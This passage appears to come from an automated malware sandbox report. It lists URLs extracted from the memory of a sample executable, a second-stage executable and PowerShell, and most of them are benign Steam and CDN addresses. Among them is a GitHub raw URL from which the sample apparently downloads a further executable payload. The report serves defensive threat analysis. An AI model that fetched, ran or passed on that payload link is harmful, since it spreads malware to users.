0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=0y-Qdz9keFm
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&amp;
Source: powershell.exe, 0000000E.00000002.2343555484.0000000005ABA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000E.00000002.2343555484.0000000005ABA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000E.00000002.2343555484.0000000005ABA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: YYjRtxS70h.exe, 00000000.00000002.3415219385.0000000002D66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
Source: powershell.exe, 0000000E.00000002.2327299767.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: YYjRtxS70h.exeString found in binary or memory: https://github.com/olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steamp
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://help.steampowered.com/en/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
Source: powershell.exe, 00000004.00000002.2023765180.00000000056EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2172468220.000000000626C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2343555484.0000000005ABA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
Source: YYjRtxS70h.exe, 00000000.00000002.3415219385.0000000002D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: YYjRtxS70h.exe, 00000000.00000002.3415219385.0000000002D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.co
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.n
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 76561199804377619[1].htm0.15.drString found in binary or memory: https://steamcommunity.com/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/#
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/Hzzp
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/c
